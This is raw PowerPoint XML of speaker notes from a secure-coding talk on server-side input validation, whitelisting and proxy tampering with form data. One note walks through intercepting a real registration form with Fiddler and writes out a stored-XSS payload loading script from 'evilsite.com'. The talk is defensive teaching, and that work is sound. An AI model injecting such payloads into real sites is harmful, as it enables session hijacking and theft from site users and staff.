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05" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="312" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="280" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="322" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="290" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="320" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="318" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="323" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="304" r:id="rId37"/>
    <p:sldId id="306" r:id="rId38"/>
    <p:sldId id="307" r:id="rId39"/>
    <p:sldId id="308" r:id="rId40"/>
    <p:sldId id="310" r:id="rId41"/>
    <p:sldId id="311" r:id="rId42"/>
    <p:sldId id="314" r:id="rId43"/>
    <p:sldId id="321" r:id="rId44"/>
    <p:sldId id="276" r:id="rId45"/>
    <p:sldId id="279" r:id="rId46"/>
    <p:sldId id="275" r:id="rId47"/>
    <p:sldId id="303" r:id="rId48"/>
    <p:sldId id="282" r:id="rId49"/>
    <p:sldId id="319" r:id="rId50"/>
    <p:sldId id="283" r:id="rId51"/>
    <p:sldId id="284" r:id="rId52"/>
    <p:sldId id="285" r:id="rId53"/>
    <p:sldId id="286" r:id="rId54"/>
    <p:sldId id="288" r:id="rId55"/>
    <p:sldId id="289" r:id="rId56"/>
    <p:sldId id="309" r:id="rId57"/>
    <p:sldId id="313" r:id="rId58"/>
    <p:sldId id="315" r:id="rId59"/>
    <p:sldId id="317" r:id="rId60"/>
    <p:sldId id="293" r:id="rId61"/>
    <p:sldId id="294" r:id="rId62"/>
    <p:sldId id="295" r:id="rId63"/>
    <p:sldId id="296" r:id="rId64"/>
    <p:sldId id="297" r:id="rId65"/>
    <p:sldId id="298" r:id="rId66"/>
    <p:sldId id="299" r:id="rId67"/>
    <p:sldId id="316" r:id="rId68"/>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375" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73" d="100"/>
        </p:scale>
        <p:origin x="2004" y="60"/>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3101"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3545199C-1ECD-439A-AF7D-8FAB3D2FB60F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/31/2015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2C20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286578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riskbasedsecurity.com/2015/07/mid-year-2015-78-of-1860-data-breaches-the-result-of-hackin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security is critical to all businesses – including ours. We have databases that contain personally identifiable information (“PII”) that is protected by U.S. privacy laws, and access must therefore be restricted to authorized personnel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have citizen-facing web sites that must be available to the public without risking their privacy and financial safety. We are responsible for their protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unfortunately, we also have attackers that want to steal any data that can be profitable…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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2740168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white list is the most secure form of data validation/sanitization.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>  A white list checks all input against a list of known good values. If the input is not an exact match to one of the items on the list,  the value is rejected as invalid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For example, validation for a “color” selection on an order form for an item that comes in ONLY red, blue, and yellow, you should check to see that ONLY one of these 3 values has been supplied; reject ANYTHING else as invalid (you can, of course, allow for case variance – perhaps translate the input to all upper or all lower case, then test against the appropriate upper/lower table of allowable colors).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Unfortunately, this works well for only a subset of the fields in a form. It works well for any field that has a limited number of “correct” values. But it does NOT work for fields that have many possible correct values – like names, addresses, cities, etc., which have (practically) infinite possibilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>White listing works extremely well for validating drop-down list entries and radio buttons.  In these cases, you know EXACTLY what is legal, so check to make certain that what was entered is one of the legal values. (Yes – the attacker can insert something into a drop-down list field that is OTHER than the selections that you provide in the list… so WHITELIST CHECK the value anyway (server side)… more in a minute) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Validating a drop-down list or radio button entry is fairly easy - simply make a table containing the same values that were supplied in the drop-down list/radio buttons, and check the input value against each entry in the table until you find an exact match - in which case the input value is “good” .  If you “fall off” the end of the table without finding an exact match, indicating a “bad” input, REJECT the data as invalid.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Remember to update your table whenever you update your drop-down list or radio button.  If you create this drop-down list/radio button entity “in code”, use the SAME table to populate the drop-down  list or radio button that you use for your “white list” check in order to ensure synchronization…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>White-listing will also work for “free-form” text entries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>IFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> there are a fairly small number of possible legal values – BUT you have to be aware of possible case differences – maybe translate all input to upper or lower case, and compare against a table that has been similarly translated. (and it is very likely that you’d be better off putting this in a drop-down or radio button instead of “free form”, if there are only a limited number of “good” values…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>“But wait a minute”, you say… “if I have a drop-down list, the user CAN’T select an incorrect value, so validating/sanitizing the drop-down/radio is a waste of time!”  However, you’d be wrong – by using a proxy – like Fiddler, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FoxyProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>TamperData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, ZAP, Burp Suite, or others – the proxy can “catch” the HTTP stream just before the browser sends it back to the server, AFTER your browser side validation has run,  and allow the attacker to manually modify ANYTHING – including the drop-down list and any “hidden” values… before the data  is passed back to the server. So you DO have to validate/sanitize these items!!  (We’ll see more of Fiddler in a minute…)</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1894363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 white-list any fields that have a limited number of allowable values.  Pretty foolproof.  But what about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> all of the other fields? Those with virtually infinite variability and can’t be white-listed?  You need to validate/sanitize these as well…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Numeric fields – telephone numbers, social security numbers, quantities (“number of dependents”), height, weight,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> age, etc. – should be all numeric, containing NO alphabetic/special characters (unless you allow punctuation, in which case you’ll also need to allow for hyphens -and maybe parenthesis- for things like telephone and SS numbers, decimal points and commas for numbers, etc.)  Money values should be all numeric plus 1 decimal point (at most), and perhaps a currency symbol, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Some numbers can (and should be) range checked.  Somebody filling in an online form was likely born AFTER 1914, and BEFORE 2010 (pick your numbers…you COULD get a 110 year old…or a precocious 3 year old…), not likely that somebody has 40 children, or is over 10 feet tall. Verify numbers as “reasonable”.  Months in a date should be between 1 and 12 inclusive, days between 1 and 31 – or even better, check for the actual number of days in that month (a Feb date should be less than 29, unless leap year, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Telephone numbers should not be &gt; 20 digits. SS# should be 9.  Remember to allow for punctuation in your lengths, if you accept that in the form… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Input fields should be no longer than the corresponding database fields that will (eventually) hold  them (in general). So if the “name” field in your database is 40 characters, the name supplied in your form should be only 40 chars (truncate if longer, or issue an error message and require the user to “fix”, or take whatever other action is appropriate in your situation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you sanitize by removing potentially “bad” characters (“black list”), remember that you need to be careful with names – some names include apostrophe (O’Connor) or other “special” characters (À, ñ, ö, etc., for international names). Same for street names, cities, and some other data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>And then there’s hexadecimal in upper or lower case – e.g. %2D or %2d…  or decimal, or octal equivalents (this is where range checking or “char only” checking works well…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If .NET, consider request validation (.NET V4 and up…if you’re on an older version IT’S TIME TO UPGRADE…RIGHT NOW!!!). You can disable validation – BUT DON’T (unless you have a REALLY good reason… see http://msdn.microsoft.com/en-us/library/hh882339%28v=vs.100%29.aspx )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Prior to  June 25, 2011, first 3 digits of SS# correspond to the state where the application for a SS# was made. See: http://www.ssa.gov/employer/stateweb.htm </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Depending upon your application, this may be worth checking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Text fields should not contain any “special” characters. Escape or eliminate all special characters – like: “ , ` ’  / ? : @ &amp; = + $ # \ &lt; &gt;% ” (the quotes are included as part of this list, and are NOT used just to enclose the list…). And don’t forget hex, decimal, or Unicode equivalents (where applicable).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Use whatever validations are appropriate in your situation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There is no “one size fits all” here, so you’ll have to decide what is applicable for your particular application.  Some checks are application specific (are ranges pertinent?  If so, what are the max an min possible acceptable values?), and others are universal (numeric fields should be all numbers, etc.) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C20B865-30AA-490B-91EC-B55FD200A00E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12082780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mentioned in previous slides, the attacker can bypass client side validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>by using various tools – like proxies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FoxyProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, Fiddler, Zed Attack Proxy, Burp Suite, Tamper Data, etc.). These tools allow the attacker to modify the data AFTER your client side validation, allowing the attacker to provide literally ANYTHING  that they want to send to your server app.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So no matter HOW good your client side validation may be, you **ALWAYS ** need to validate on the server. Even for drop-down or radio-button selection items on our form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Again – because this is important – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ALWAYS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>VALIDATE/SANITIZE ALL INPUT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>FROM ANY SOURCE (INCLUDING XMLHTTPREQUEST) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ON THE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>SERVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Data that will be used in parameterized SQL queries must also be sanitized.  Not because you are worried about SQL injection (b/c if you parameterized correctly, this will not be an issue), but because you don’t want to cause “bad things” to happen when some other process extracts the data from the database to display it… Don’t “pass the buck” to the programmer writing the display logic… they may not have been exposed to these concepts (or may not have been paying attention even if exposed… second from the end, third row back - I’m talking to you!)</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3503739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 somewhat typical registration form.  (the actual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> form is fairly long, and has many more fields that require scrolling this screen to see. Some of the fields are “free form” like the ones shown here; some of the “scrolled off-screen” items are “drop-down” lists).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that this form is using HTTPS (hopefully using TLS 1.2… we’ll get to that later), so this site is at least encrypting this data in transit. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>But is this web site “safe” from an attacker?</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1587008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you’ve been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> waiting for the Fiddler example mentioned above, this is it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here I’ve used Fiddler to set a browser breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> just before the browser sends my completed Black Hat registration form data back to the server.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Any client-side (JavaScript or HTML5) validation has already run at this point, so the data has been validated/sanitized and is “good “ (at least, as good as the client-side validation checks it out to be…).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The green rectangle (left “box”) shows all of the form field names.  Note that the Black Hat web developers apparently obfuscated the form field names… except that part of the “confirm password” form field still has the “_confirm” portion of the name appended to the obfuscated “password” portion…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The red rectangle on the right shows the values that I entered into the form.  Fiddler extracted this directly from the POST data contained in the HTTPS request that is “on its way” back to the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Also note that the small fuchsia box inside the red box shows my selection of Ohio for the “State” (obfuscated as “iQnjEm26”, and was a drop-down box selection item on the form ) – passes #41 back to the server and “Country” (obfuscated: eVfzbd01) is #1 for USA… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>At this point, I can manually edit **ANY** of the data to be WHATEVER  I want it to be, including changing any drop-down list values or radio button values to “illegal” values – if I want to experiment, maybe set State to an invalid value of 267 to see what happens.   Perhaps a database error (no such alternate key?) that will expose the type of database (Oracle, MySQL, SQL Server, etc.).  Valuable information for an attacker…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Or if  I instead want to attack this site, maybe I’ll set the one (or all…) of the fields to “&lt;/span&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>="//evilsite.com/get$$$.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>"&gt;&lt;/script&gt;&lt;span&gt;”  (appropriately adjusted to “fit” the way it will be displayed…perhaps other than “span” bracketing required…), then call the support line and have them pull up my record because of a “problem” I’m having… perhaps the service agent I talk to even has elevated privileges… perhaps I’ll attend Black Hat for free???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that any “hidden” fields from the form will also be here (but no longer hidden…), and I can  alter them as well. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>When I’m done “fiddling” with the POST data, I can click the “Run to completion” (green button inside the bottom fuchsia box) to POST my modified data directly (meaning no further validation, etc.) to the sever.  If this site is not validating/sanitizing on the server… well, you know!! (I did NOT submit this, as I was not actually registering.  Also, attempting to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a website w/o owners permission – preferably written – is illegal, so don’t try this at home unless you first get permission from the powers that be…  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>I assume that Black Hat HAS adequate server side validation to thwart any attack…but I cancelled at this point, and did –not-- “Run to completion”…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that I can also set Fiddler breakpoints to catch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (AJAX/SOAP/homegrown), and “fiddle” that data as well.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>**MUST ALWAYS**  validate data arriving from ANYWHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>– including AJAX processing.  Just because you wrote the HTML or JavaScript code involved with the AJAX request doesn’t mean that you have ANY idea WHAT will actually arrive at the server…  No matter that you are a JavaScript Ninja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The same thing can be accomplished by using other proxies – many of which are free…</a:t>
            </a:r>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="476579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Client-side validation/sanitization is excellent for performance, and therefore desirable.  It offloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the server of “busy work” - whenever a request comes “in” to the server from the network, there is: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Network bandwidth consumed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Load-balancing may be involved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>I/O interrupts to the server (which costs CPU cycles and causes context switches),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>memory acquisition for buffering of the message, possibly flushing other data out of data caches,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="174982" indent="-174982">
              <a:buFontTx/>
